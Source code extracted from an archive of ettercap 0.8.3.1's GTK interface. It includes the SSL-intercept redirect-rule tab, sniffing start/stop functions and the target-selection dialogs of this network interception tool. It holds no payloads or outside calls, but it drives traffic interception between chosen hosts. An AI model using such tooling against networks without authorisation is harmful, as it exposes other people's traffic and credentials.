{ /* otherwise add rule to rules list */ gtk_list_store_append(redirrules, &iter); gtk_list_store_set(redirrules, &iter, 0, ip_ver, 1, (ip_ver == EC_REDIR_PROTO_IPV4 ? "IPv4" : "IPv6"), 2, server, 3, from_port, 4, to_port, 5, ec_strlc(name), 6, ec_struc(name), -1); } } gtk_widget_destroy(dialog); } /* * remove selected redirect rules */ void gtkui_sslredir_del(GtkWidget *widget, gpointer data) { GList *list; GtkTreeIter iter, iter_unsorted; GtkTreeModel *model; int ret; gchar *name; const gchar *server; guint32 from_port, to_port; ec_redir_proto_t ip_ver; /* variable not used */ (void) widget; DEBUG_MSG("gtkui_sslredir_del()"); model = gtk_tree_model_sort_get_model(GTK_TREE_MODEL_SORT(data)); /* get selected entries */ if (gtk_tree_selection_count_selected_rows(selection) > 0) { list = gtk_tree_selection_get_selected_rows(selection, &model); for (list = g_list_last(list); list; list = g_list_previous(list)) { /* extract parameters from GtkTreeView model */ gtk_tree_model_get_iter(model, &iter, list->data); gtk_tree_model_get(model, &iter, 0, &ip_ver, 2, &server, 3, &from_port, 4, &to_port, 5, &name, -1); /* execute redirect action */ ret = ec_redirect(EC_REDIR_ACTION_REMOVE, name, ip_ver, server, from_port, to_port); /* inform user if redirect execution wasn't successful */ if (ret != E_SUCCESS) gtkui_message("Removal of redirect rule failed."); else { /* otherwise remove from list */ gtk_tree_model_sort_convert_iter_to_child_iter( GTK_TREE_MODEL_SORT(data), &iter_unsorted, &iter); gtk_list_store_remove(GTK_LIST_STORE(redirrules), &iter_unsorted); } } /* free the list of selection */ g_list_free_full(list, (GDestroyNotify)gtk_tree_path_free); } } /* * select all entries in TreeModel then then call gtkui_sslredir_del */ void gtkui_sslredir_del_all(GtkWidget *widget, gpointer data) { DEBUG_MSG("gtkui_sslredir_del_all():"); gtk_tree_selection_select_all(selection); gtkui_sslredir_del(widget, data); } /* detach ssl redir tab */ static void gtkui_sslredir_detach(GtkWidget *child) { sslredir_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW(sslredir_window), "SSL Intercept"); gtk_window_set_default_size(GTK_WINDOW(sslredir_window), 500, 250); g_signal_connect(G_OBJECT(sslredir_window), "delete_event", G_CALLBACK(gtkui_sslredir_close), NULL); gtkui_page_attach_shortcut(sslredir_window, gtkui_sslredir_attach); gtk_container_add(GTK_CONTAINER(sslredir_window), child); gtk_window_present(GTK_WINDOW(sslredir_window)); } /* callback for reattaching the detached ssl redir tab */ static void gtkui_sslredir_attach(void) { gtkui_sslredir_close(); gtkui_sslredir_show(); } /* close ssl redir tab */ static void gtkui_sslredir_close(void) { DEBUG_MSG("gtk_sslredir_close"); gtk_widget_destroy(sslredir_window); sslredir_window = NULL; } /* * create the list for the list of interceptable protocols */ static void gtkui_sslredir_create_lists(void) { int res; DEBUG_MSG("gtk_sslredir_create_lists()"); /* populate redirect rules */ if (redirrules == NULL) { redirrules = gtk_list_store_new(7, G_TYPE_UINT, /* IP address family */ G_TYPE_STRING, /* IP address family human readable */ G_TYPE_STRING, /* destination definition */ G_TYPE_UINT, /* protocol registered port */ G_TYPE_UINT, /* ettercap listener port */ G_TYPE_STRING, /* protocol name lower case */ G_TYPE_STRING); /* protocol name upper case */ /* walk through list of registered redirects */ res = ec_walk_redirects(>kui_sslredir_add_list); if (res == -E_NOTFOUND) { DEBUG_MSG("gtk_sslredir_create_lists(): no redirects registered - " "apparently no redirect commands enabled in etter.conf"); gtkui_message("Traffic redirect not enabled in etter.conf. "); } } /* populate registered services */ if (proto_list == NULL) { proto_list = gtk_list_store_new(4, G_TYPE_STRING, /* protocol name lower case */ G_TYPE_STRING, /* protocol name upper case */ G_TYPE_UINT, /* protocol registered port */ G_TYPE_UINT); /* ettercap listener port */ res = ec_walk_redirect_services(>kui_sslredir_add_service); if (res == -E_NOTFOUND) { g_object_unref(proto_list); proto_list = NULL; } } } /* * callback function to compose the list of active services */ static void gtkui_sslredir_add_service(struct serv_entry *se) { GtkTreeIter iter; DEBUG_MSG("gtkui_sslredir_add_service(%s)", se->name); /* update protocol list store */ gtk_list_store_append(proto_list, &iter); gtk_list_store_set(proto_list, &iter, 0, ec_strlc(se->name), 1, ec_struc(se->name), 2, se->from_port, 3, se->to_port, -1); } /* * callback function to compose the list of active redirects */ static void gtkui_sslredir_add_list(struct redir_entry *re) { GtkTreeIter iter; DEBUG_MSG("gtkui_sslredir_add_list(%s)", re->name); /* add rule to rules list */ gtk_list_store_append(redirrules, &iter); gtk_list_store_set(redirrules, &iter, 0, re->proto, 1, (re->proto == EC_REDIR_PROTO_IPV4 ? "IPv4" : "IPv6"), 2, re->destination, 3, re->from_port, 4, re->to_port, 5, ec_strlc(re->name), 6, ec_struc(re->name), -1); } /* * callback when IP address family is changed * - update preset string of source / destination entry widgets */ void gtkui_sslredir_af_changed(GtkWidget *widget, gpointer data) { GtkTreeModel *model; GtkTreeIter iter; ec_redir_proto_t proto; model = gtk_combo_box_get_model(GTK_COMBO_BOX(widget)); gtk_combo_box_get_active_iter(GTK_COMBO_BOX(widget), &iter); gtk_tree_model_get(model, &iter, 1, &proto, -1); switch (proto) { case EC_REDIR_PROTO_IPV4: gtk_entry_set_text(GTK_ENTRY(data), "0.0.0.0/0"); gtk_widget_grab_focus(data); break; case EC_REDIR_PROTO_IPV6: gtk_entry_set_text(GTK_ENTRY(data), "::/0"); gtk_widget_grab_focus(data); break; default: break; } } /* * callback function when delete key is pressed in redirect rule list */ gboolean gtkui_sslredir_key_pressed(GtkWidget *widget, GdkEventKey *event, gpointer data) { DEBUG_MSG("gtkui_sslredir_key_pressed()"); if (event->keyval == gdk_keyval_from_name("Delete")) { gtkui_sslredir_del(widget, data); return TRUE; } if (event->keyval == gdk_keyval_from_name("Insert")) { gtkui_sslredir_add(widget, data); return TRUE; } /* fall through to other handlers */ return FALSE; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_start.c000664 000000 000000 00000002260 13711276346 021776 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /*******************************************/ void gtkui_start_sniffing(void) { DEBUG_MSG("gtk_start_sniffing"); /* start the sniffing method */ EXECUTE(EC_GBL_SNIFF->start); } void gtkui_stop_sniffing(void) { DEBUG_MSG("gtk_stop_sniffing"); /* terminate the sniffing engine */ EXECUTE(EC_GBL_SNIFF->cleanup); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_targets.c000664 000000 000000 00000054042 13711276346 022317 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* proto */ static void set_targets(void); static void gtkui_add_target1(void *); static void gtkui_add_target2(void *); static void add_target1(void); static void add_target2(void); static void gtkui_delete_targets(GtkWidget *widget, gpointer data); static void gtkui_targets_destroy(void); static void gtkui_targets_detach(GtkWidget *child); static void gtkui_targets_attach(void); /* globals */ static char thost[MAX_ASCII_ADDR_LEN]; GtkWidget *targets_window = NULL; GtkTreeSelection *selection1 = NULL; GtkTreeSelection *selection2 = NULL; GtkListStore *liststore1 = NULL; GtkListStore *liststore2 = NULL; /*******************************************/ void toggle_reverse(void) { if (EC_GBL_OPTIONS->reversed) { EC_GBL_OPTIONS->reversed = 0; } else { EC_GBL_OPTIONS->reversed = 1; } } /* * wipe the targets struct setting both T1 and T2 to ANY/ANY/ANY */ void wipe_targets(void) { DEBUG_MSG("wipe_targets"); reset_display_filter(EC_GBL_TARGET1); reset_display_filter(EC_GBL_TARGET2); /* update the GTK liststores */ gtkui_create_targets_array(); /* display the message */ gtkui_message("TARGETS were reset to ANY/ANY/ANY"); } /* * display the protocol dialog */ void gtkui_select_protocol(void) { GtkWidget *dialog, *content, *radio, *hbox, *frame; GSList *list = NULL; gint active = 1; enum {proto_udp, proto_tcp, proto_all}; DEBUG_MSG("gtk_select_protocol"); /* this will contain 'all', 'tcp' or 'udp' */ if (!EC_GBL_OPTIONS->proto) { SAFE_CALLOC(EC_GBL_OPTIONS->proto, 4, sizeof(char)); strncpy(EC_GBL_OPTIONS->proto, "all", 4); } /* create dialog for selecting the protocol */ dialog = gtk_dialog_new_with_buttons("Set protocol", GTK_WINDOW(window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); frame = gtk_frame_new("Select the protocol"); gtk_container_add(GTK_CONTAINER(content), frame); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 10, FALSE); gtk_container_add(GTK_CONTAINER(frame), hbox); radio = gtk_radio_button_new_with_mnemonic(NULL, "a_ll"); gtk_box_pack_start(GTK_BOX(hbox), radio, TRUE, TRUE, 2); if (!strncasecmp(EC_GBL_OPTIONS->proto, "all", 4)) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radio), TRUE); radio = gtk_radio_button_new_with_mnemonic_from_widget(GTK_RADIO_BUTTON(radio), "_tcp"); gtk_box_pack_start(GTK_BOX(hbox), radio, TRUE, TRUE, 2); if (!strncasecmp(EC_GBL_OPTIONS->proto, "tcp", 4)) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radio), TRUE); radio = gtk_radio_button_new_with_mnemonic_from_widget(GTK_RADIO_BUTTON(radio), "_udp"); gtk_box_pack_start(GTK_BOX(hbox), radio, TRUE, TRUE, 2); if (!strncasecmp(EC_GBL_OPTIONS->proto, "udp", 4)) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radio), TRUE); gtk_widget_grab_focus(gtk_dialog_get_widget_for_response(GTK_DIALOG(dialog), GTK_RESPONSE_OK)); gtk_widget_show_all(dialog); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { list = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radio)); for(active = 0; list != NULL; list = list->next) { if (gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON(list->data))) { switch (active) { case proto_all: strncpy(EC_GBL_OPTIONS->proto, "all", 4); break; case proto_tcp: strncpy(EC_GBL_OPTIONS->proto, "tcp", 4); break; case proto_udp: strncpy(EC_GBL_OPTIONS->proto, "udp", 4); break; } } active++; } } gtk_widget_destroy(dialog); } /* * display the TARGET(s) dialog */ void gtkui_select_targets(void) { GtkWidget *dialog, *label, *table, *content; GtkWidget *frame1, *frame2; GtkWidget *t1_mac, *t1_ip, *t1_port, *t2_mac, *t2_ip, *t2_port; gint ncols = 2, nrows = 3; #ifdef WITH_IPV6 GtkWidget *t1_ipv6, *t2_ipv6; nrows = 4; #endif #define TARGET_LEN ETH_ASCII_ADDR_LEN + 1 + \ IP_ASCII_ADDR_LEN + 1 + \ IP6_ASCII_ADDR_LEN + 1 + \ 5 + 1 DEBUG_MSG("gtk_select_targets"); dialog = gtk_dialog_new_with_buttons("Enter Targets", GTK_WINDOW(window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_set_border_width(GTK_CONTAINER(content), 20); frame1 = gtk_frame_new("Target 1"); gtk_container_add(GTK_CONTAINER(content), frame1); frame2 = gtk_frame_new("Target 2"); gtk_container_add(GTK_CONTAINER(content), frame2); table = gtk_table_new(nrows, ncols, FALSE); gtk_table_set_row_spacings(GTK_TABLE (table), 5); gtk_table_set_col_spacings(GTK_TABLE (table), 5); gtk_container_set_border_width(GTK_CONTAINER (table), 8); gtk_container_add(GTK_CONTAINER (frame1), table); label = gtk_label_new("MAC:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE (table), label, 0, 1, 0, 1, GTK_FILL, GTK_FILL, 0, 0); t1_mac = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t1_mac), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t1_mac), MAX_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE(table), t1_mac, 1, 2, 0, 1); label = gtk_label_new("IP address:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, 0, 1, 1, 2, GTK_FILL, GTK_FILL, 0, 0); t1_ip = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t1_ip), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t1_ip), MAX_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE(table), t1_ip, 1, 2, 1, 2); #ifdef WITH_IPV6 label = gtk_label_new("IPv6 address:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, 0, 1, 2, 3, GTK_FILL, GTK_FILL, 0, 0); t1_ipv6 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t1_ipv6), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t1_ipv6), MAX_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE(table), t1_ipv6, 1, 2, 2, 3); #endif label = gtk_label_new("Port:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, 0, 1, nrows-1, nrows, GTK_FILL, GTK_FILL, 0, 0); t1_port = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t1_port), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t1_port), MAX_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE(table), t1_port, 1, 2, nrows-1, nrows); /* Fill previously set values */ if (EC_GBL_OPTIONS->target1) { gchar **tokens, **p; tokens = g_strsplit(EC_GBL_OPTIONS->target1, "/", nrows); p = tokens; /* MAC */ gtk_entry_set_text(GTK_ENTRY(t1_mac), *p++); /* IP address */ gtk_entry_set_text(GTK_ENTRY(t1_ip), *p++); #ifdef WITH_IPV6 /* IPv6 address */ gtk_entry_set_text(GTK_ENTRY(t1_ipv6), *p++); #endif /* Port */ gtk_entry_set_text(GTK_ENTRY(t1_port), *p); g_strfreev(tokens); } /* Target 2: */ table = gtk_table_new(nrows, ncols, FALSE); gtk_table_set_row_spacings(GTK_TABLE (table), 5); gtk_table_set_col_spacings(GTK_TABLE (table), 5); gtk_container_set_border_width(GTK_CONTAINER (table), 8); gtk_container_add(GTK_CONTAINER (frame2), table); label = gtk_label_new("MAC:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE (table), label, 0, 1, 0, 1, GTK_FILL, GTK_FILL, 0, 0); t2_mac = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t2_mac), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t2_mac), MAX_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE(table), t2_mac, 1, 2, 0, 1); label = gtk_label_new("IP address:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, 0, 1, 1, 2, GTK_FILL, GTK_FILL, 0, 0); t2_ip = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t2_ip), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t2_ip), MAX_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE(table), t2_ip, 1, 2, 1, 2); #ifdef WITH_IPV6 label = gtk_label_new("IPv6 address:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, 0, 1, 2, 3, GTK_FILL, GTK_FILL, 0, 0); t2_ipv6 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t2_ipv6), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t2_ipv6), MAX_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE(table), t2_ipv6, 1, 2, 2, 3); #endif label = gtk_label_new("Port:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, 0, 1, nrows-1, nrows, GTK_FILL, GTK_FILL, 0, 0); t2_port = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t2_port), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t2_port), MAX_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE(table), t2_port, 1, 2, nrows-1, nrows); /* Fill previously set values */ if (EC_GBL_OPTIONS->target2) { gchar **tokens, **p; tokens = g_strsplit(EC_GBL_OPTIONS->target2, "/", nrows); p = tokens; /* MAC */ gtk_entry_set_text(GTK_ENTRY(t2_mac), *p++); /* IP address */ gtk_entry_set_text(GTK_ENTRY(t2_ip), *p++); #ifdef WITH_IPV6 /* IPv6 address */ gtk_entry_set_text(GTK_ENTRY(t2_ipv6), *p++); #endif /* Port */ gtk_entry_set_text(GTK_ENTRY(t2_port), *p); g_strfreev(tokens); } gtk_widget_show_all(dialog); if (gtk_dialog_run (GTK_DIALOG (dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); SAFE_FREE(EC_GBL_OPTIONS->target1); SAFE_FREE(EC_GBL_OPTIONS->target2); SAFE_CALLOC(EC_GBL_OPTIONS->target1, TARGET_LEN, sizeof(char)); SAFE_CALLOC(EC_GBL_OPTIONS->target2, TARGET_LEN, sizeof(char)); #ifdef WITH_IPV6 snprintf(EC_GBL_OPTIONS->target1, TARGET_LEN, "%s/%s/%s/%s", gtk_entry_get_text(GTK_ENTRY(t1_mac)), gtk_entry_get_text(GTK_ENTRY(t1_ip)), gtk_entry_get_text(GTK_ENTRY(t1_ipv6)), gtk_entry_get_text(GTK_ENTRY(t1_port))); snprintf(EC_GBL_OPTIONS->target2, TARGET_LEN, "%s/%s/%s/%s", gtk_entry_get_text(GTK_ENTRY(t2_mac)), gtk_entry_get_text(GTK_ENTRY(t2_ip)), gtk_entry_get_text(GTK_ENTRY(t2_ipv6)), gtk_entry_get_text(GTK_ENTRY(t2_port))); #else snprintf(EC_GBL_OPTIONS->target1, TARGET_LEN, "%s/%s/%s", gtk_entry_get_text(GTK_ENTRY(t1_mac)), gtk_entry_get_text(GTK_ENTRY(t1_ip)), gtk_entry_get_text(GTK_ENTRY(t1_port))); snprintf(EC_GBL_OPTIONS->target2, TARGET_LEN, "%s/%s/%s", gtk_entry_get_text(GTK_ENTRY(t2_mac)), gtk_entry_get_text(GTK_ENTRY(t2_ip)), gtk_entry_get_text(GTK_ENTRY(t2_port))); #endif set_targets(); } gtk_widget_destroy(dialog); } /* * set the targets */ static void set_targets(void) { /* delete the previous filters */ reset_display_filter(EC_GBL_TARGET1); reset_display_filter(EC_GBL_TARGET2); /* free empty filters */ if (!strcmp(EC_GBL_OPTIONS->target1, "")) SAFE_FREE(EC_GBL_OPTIONS->target1); /* free empty filters */ if (!strcmp(EC_GBL_OPTIONS->target2, "")) SAFE_FREE(EC_GBL_OPTIONS->target2); /* compile the filters */ compile_display_filter(); /* if the 'current targets' window is displayed, refresh it */ if (targets_window) gtkui_current_targets(); } /* * display the list of current targets */ void gtkui_current_targets(void) { GtkWidget *scrolled, *treeview, *vbox, *hbox, *button; GtkCellRenderer *renderer; GtkTreeViewColumn *column; static gint delete_targets1 = 1; static gint delete_targets2 = 2; DEBUG_MSG("gtk_current_targets"); /* prepare the liststores for the target lists */ gtkui_create_targets_array(); if(targets_window) { if(GTK_IS_WINDOW (targets_window)) gtk_window_present(GTK_WINDOW (targets_window)); else gtkui_page_present(targets_window); return; } targets_window = gtkui_page_new("Targets", >kui_targets_destroy, >kui_targets_detach); vbox= gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_container_add(GTK_CONTAINER (targets_window), vbox); gtk_widget_show(vbox); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, TRUE); gtk_box_pack_start(GTK_BOX(vbox), hbox, TRUE, TRUE, 0); gtk_widget_show(hbox); /* list one */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(hbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (liststore1)); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection1 = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection1, GTK_SELECTION_MULTIPLE); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Target 1", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); /* list two */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(hbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (liststore2)); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection2 = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection2, GTK_SELECTION_MULTIPLE); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Target 2", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); /* buttons */ hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, TRUE); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); button = gtk_button_new_with_mnemonic("Delete"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_delete_targets), &delete_targets1); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); button = gtk_button_new_with_mnemonic("Add"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_add_target1), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); button = gtk_button_new_with_mnemonic("Delete"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_delete_targets), &delete_targets2); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); button = gtk_button_new_with_mnemonic("Add"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_add_target2), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show_all(hbox); gtk_widget_show(targets_window); } static void gtkui_targets_detach(GtkWidget *child) { targets_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (targets_window), "Current Targets"); gtk_window_set_default_size(GTK_WINDOW (targets_window), 400, 300); g_signal_connect (G_OBJECT (targets_window), "delete_event", G_CALLBACK (gtkui_targets_destroy), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(targets_window, gtkui_targets_attach); gtk_container_add(GTK_CONTAINER (targets_window), child); gtk_window_present(GTK_WINDOW (targets_window)); } static void gtkui_targets_attach(void) { gtkui_targets_destroy(); gtkui_current_targets(); } static void gtkui_targets_destroy(void) { gtk_widget_destroy(targets_window); targets_window = NULL; } /* * create the array for the widget. * erase any previously alloc'd array */ void gtkui_create_targets_array(void) { GtkTreeIter iter; struct ip_list *il; char tmp[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("gtk_create_targets_array"); if(liststore1) gtk_list_store_clear(GTK_LIST_STORE (liststore1)); else liststore1 = gtk_list_store_new (2, G_TYPE_STRING, G_TYPE_POINTER); /* walk TARGET 1 */ LIST_FOREACH(il, &EC_GBL_TARGET1->ips, next) { /* enlarge the array */ gtk_list_store_append (liststore1, &iter); /* fill the element */ gtk_list_store_set (liststore1, &iter, 0, ip_addr_ntoa(&il->ip, tmp), 1, il, -1); } #ifdef WITH_IPV6 /* walk TARGET 1 - IPv6 */ LIST_FOREACH(il, &EC_GBL_TARGET1->ip6, next) { /* enlarge the array */ gtk_list_store_append (liststore1, &iter); /* fill the element */ gtk_list_store_set (liststore1, &iter, 0, ip_addr_ntoa(&il->ip, tmp), 1, il, -1); } #endif if(liststore2) gtk_list_store_clear(GTK_LIST_STORE (liststore2)); else liststore2 = gtk_list_store_new (2, G_TYPE_STRING, G_TYPE_POINTER); /* walk TARGET 2 */ LIST_FOREACH(il, &EC_GBL_TARGET2->ips, next) { /* enlarge the array */ gtk_list_store_append (liststore2, &iter); /* fill the element */ gtk_list_store_set (liststore2, &iter, 0, ip_addr_ntoa(&il->ip, tmp), 1, il, -1); } #ifdef WITH_IPV6 /* walk TARGET 2 - IPv6 */ LIST_FOREACH(il, &EC_GBL_TARGET2->ip6, next) { /* enlarge the array */ gtk_list_store_append (liststore2, &iter); /* fill the element */ gtk_list_store_set (liststore2, &iter, 0, ip_addr_ntoa(&il->ip, tmp), 1, il, -1); } #endif } /* * display the "add host" dialog */ static void gtkui_add_target1(void *entry) { /* variable not used */ (void) entry; DEBUG_MSG("gtk_add_target1"); gtkui_input("IP address :", thost, MAX_ASCII_ADDR_LEN, add_target1); } static void gtkui_add_target2(void *entry) { /* variable not used */ (void) entry; DEBUG_MSG("gtk_add_target2"); gtkui_input("IP address :", thost, MAX_ASCII_ADDR_LEN, add_target2); } static void add_target1(void) { struct ip_addr host; if (ip_addr_pton(thost, &host) != E_SUCCESS) { /* neither IPv4 nor IPv6 - inform user */ gtkui_message("Invalid ip address"); return; } add_ip_list(&host, EC_GBL_TARGET1); /* refresh the list */ gtkui_create_targets_array(); } static void add_target2(void) { struct ip_addr host; if (ip_addr_pton(thost, &host) != E_SUCCESS) { /* neither IPv4 nor IPv6 - inform user */ gtkui_message("Invalid ip address"); return; } add_ip_list(&host, EC_GBL_TARGET2); /* refresh the list */ gtkui_create_targets_array(); } static void gtkui_delete_targets(GtkWidget *widget, gpointer data) { GList *list = NULL; GtkTreeIter iter; GtkTreeModel *model; struct ip_list *il = NULL; gint *type = data; /* variable not used */ (void) widget; if (type == NULL) return; switch(*type) { case 1: DEBUG_MSG("gtkui_delete_target: list 1"); model = GTK_TREE_MODEL (liststore1); if(gtk_tree_selection_count_selected_rows(selection1) > 0) { list = gtk_tree_selection_get_selected_rows (selection1, &model); for(list = g_list_last(list); list; list = g_list_previous(list)) { gtk_tree_model_get_iter(model, &iter, list->data); gtk_tree_model_get (model, &iter, 1, &il, -1); /* remove the host from the list */ del_ip_list(&il->ip, EC_GBL_TARGET1); gtk_list_store_remove(GTK_LIST_STORE (liststore1), &iter); } } break; case 2: DEBUG_MSG("gtkui_delete_target: list 2"); model = GTK_TREE_MODEL (liststore2); if(gtk_tree_selection_count_selected_rows(selection2) > 0) { list = gtk_tree_selection_get_selected_rows (selection2, &model); for(list = g_list_last(list); list; list = g_list_previous(list)) { gtk_tree_model_get_iter(model, &iter, list->data); gtk_tree_model_get (model, &iter, 1, &il, -1); /* remove the host from the list */ del_ip_list(&il->ip, EC_GBL_TARGET2); gtk_list_store_remove(GTK_LIST_STORE (liststore2), &iter); } } break; } /* free the list of selections */ if(list) { g_list_foreach (list,(GFunc) gtk_tree_path_free, NULL); g_list_free (list); } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_view.c000664 000000 000000 00000050002 13711276346 021610 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include 